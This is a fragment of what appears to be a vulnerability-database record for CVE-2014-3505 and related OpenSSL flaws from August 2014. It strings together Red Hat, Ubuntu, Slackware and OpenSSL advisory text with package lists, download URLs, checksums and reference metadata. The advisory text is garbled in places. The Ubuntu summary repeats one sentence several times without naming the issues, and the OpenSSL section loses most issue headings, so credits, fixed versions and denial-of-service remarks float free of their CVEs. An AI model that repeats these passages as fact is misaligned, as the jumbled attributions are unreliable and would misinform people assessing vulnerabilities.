6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-static-1.0.1e-16.el6_5.15.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\n\nppc64:\nopenssl-1.0.1e-16.el6_5.15.ppc.rpm\nopenssl-1.0.1e-16.el6_5.15.ppc64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.ppc.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.ppc64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.ppc.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-16.el6_5.15.s390.rpm\nopenssl-1.0.1e-16.el6_5.15.s390x.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.s390.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.s390x.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.s390.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-static-1.0.1e-16.el6_5.15.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.ppc64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.ppc64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.s390x.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.s390x.rpm\nopenssl-static-1.0.1e-16.el6_5.15.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-static-1.0.1e-16.el6_5.15.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.4.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.4.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.4.src.rpm\n\nppc64:\nopenssl-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-static-1.0.1e-34.el7_0.4.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-static-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-static-1.0.1e-34.el7_0.4.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.4.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-3505.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3506.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3507.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3508.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3509.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3510.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3511.html\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://www.openssl.org/news/secadv_20140806.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFT69raXlSAg2UNWIIRAiQAAKCbp6Iou4mHuootBfgs0jm7zP/wWACgt50C\npHXxupQnHYYH+zJFOmk5u8o=\n=DwUW\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ============================================================================\nUbuntu Security Notice USN-2308-1\nAugust 07, 2014\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. This issue\nonly affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. When OpenSSL is used with certain\napplications, an attacker may use this issue to possibly gain access to\nsensitive information. This issue\nonly affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS\nand Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-5139)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.5\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.17\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.20\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. \n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz\n3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz\n075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz\n92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\ndf5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz\n582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz\nb80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz\n0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\nd1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz\nec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz\n25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz\n4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nf2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz\n4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz\n27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz\n\nSlackware x86_64 -current packages:\n8d74f3d770802182137c84d925f58cbc a/openssl-solibs-1.0.1i-x86_64-1.txz\nfd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. OpenSSL Security Advisory [6 Aug 2014]\n========================================\n\nInformation leak in pretty printing functions (CVE-2014-3508)\n=============================================================\n\nA flaw in OBJ_obj2txt may cause pretty printing functions such as\nX509_name_oneline, X509_name_print_ex et al. to leak some information from the\nstack. Applications may be affected if they echo pretty printing output to the\nattacker. OpenSSL SSL/TLS clients and servers themselves are not affected. \n\nThanks to Ivan Fratric (Google) for discovering this issue. This issue\nwas reported to OpenSSL on 19th June 2014. \n\nThe fix was developed by Emilia K\u00e4sper and Stephen Henson of the OpenSSL\ndevelopment team. This can\nbe exploited through a Denial of Service attack. \n\nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Joonas Kuorilehto and Riku Hietam\u00e4ki (Codenomicon) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 2nd July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\nOpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this\nissue. This issue was reported to OpenSSL on 8th July 2014. \n\nThe fix was developed by Gabor Tyukasz. This can be exploited\nthrough a Denial of Service attack. \n\nThanks to Adam Langley and Wan-Teh Chang (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 6th June\n2014. \n\nThe fix was developed by Adam Langley. This can be exploited through a Denial of\nService attack. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. This can be exploited through a Denial of Service attack. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. \n\nOpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)\n===============================================================\n\nOpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a\ndenial of service attack. A malicious server can crash the client with a null\npointer dereference (read) by specifying an anonymous (EC)DH ciphersuite and\nsending carefully crafted handshake messages. \n\nOpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i. \n\nThanks to Felix Gr\u00f6bert (Google) for discovering and researching this issue. \nThis issue was reported to OpenSSL on 18th July 2014. \n\nThe fix was developed by Emilia K\u00e4sper of the OpenSSL development team. \n\nOpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i. \n\nThanks to David Benjamin and Adam Langley (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 21st July 2014. \n\nThe fix was developed by David Benjamin. \n\n\nSRP buffer overrun (CVE-2014-3512)\n==================================\n\nA malicious client or server can send invalid SRP parameters and overrun\nan internal buffer. Only applications which are explicitly set up for SRP\nuse are affected. \n\nThanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC\nGroup) for discovering this issue. This issue was reported to OpenSSL\non 31st July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20140806.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time", "sources": [ { "db": "NVD", "id": "CVE-2014-3505" }, { "db": "BID", "id": "69081" }, { "db": "VULMON", "id": "CVE-2014-3505" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "127861" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "128297" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" } ], "trust": 1.89 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3505", "trust": 2.7 }, { "db": "BID", "id": "69081", "trust": 1.4 }, { "db": "SECUNIA", "id": "61250", "trust": 1.1 }, { "db": "SECUNIA", "id": "59710", "trust": 1.1 }, { "db": "SECUNIA", "id": "60687", "trust": 1.1 }, { "db": "SECUNIA", "id": "61184", "trust": 1.1 }, { "db": "SECUNIA", "id": "60938", "trust": 1.1 }, { "db": "SECUNIA", "id": "60684", "trust": 1.1 }, { "db": "SECUNIA", "id": "61775", "trust": 1.1 }, { "db": "SECUNIA", "id": "60493", "trust": 1.1 }, { "db": "SECUNIA", "id": "59221", "trust": 1.1 }, { "db": "SECUNIA", "id": "60221", "trust": 1.1 }, { "db": "SECUNIA", "id": "59743", "trust": 1.1 }, { "db": "SECUNIA", "id": "60778", "trust": 1.1 }, { "db": "SECUNIA", "id": "59756", "trust": 1.1 }, { "db": "SECUNIA", "id": "60921", "trust": 1.1 }, { "db": "SECUNIA", "id": "61959", "trust": 1.1 }, { "db": "SECUNIA", "id": "60917", "trust": 1.1 }, { "db": "SECUNIA", "id": "61040", "trust": 1.1 }, { "db": "SECUNIA", "id": "59700", "trust": 1.1 }, { "db": "SECUNIA", "id": "60803", "trust": 1.1 }, { "db": "SECUNIA", "id": "60824", "trust": 1.1 }, { "db": "SECUNIA", "id": "61100", "trust": 1.1 }, { "db": "SECUNIA", "id": "60022", "trust": 1.1 }, { "db": "SECUNIA", "id": "58962", "trust": 1.1 }, { "db": "SECTRACK", "id": "1030693", "trust": 1.1 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "LENOVO", "id": "LEN-24443", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201408-126", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2014-3505", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130868", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128248", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127861", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127790", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128297", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127811", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169648", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3505" }, { "db": "BID", "id": "69081" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "127861" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "128297" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-126" }, { "db": "NVD", "id": "CVE-2014-3505" } ] }, "id": "VAR-201408-0094", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44401007833333334 }, "last_update_date": "2024-07-04T20:22:30.174000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "openssl-1.0.1i", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51696" }, { "title": "openssl-1.0.0n", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51695" }, { "title": "openssl-0.9.8zb", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51694" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2308-1" }, { "title": "Debian Security Advisories: DSA-2998-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=bfd576c692d8814b2a331baf29ad367c" }, { "title": "Amazon Linux 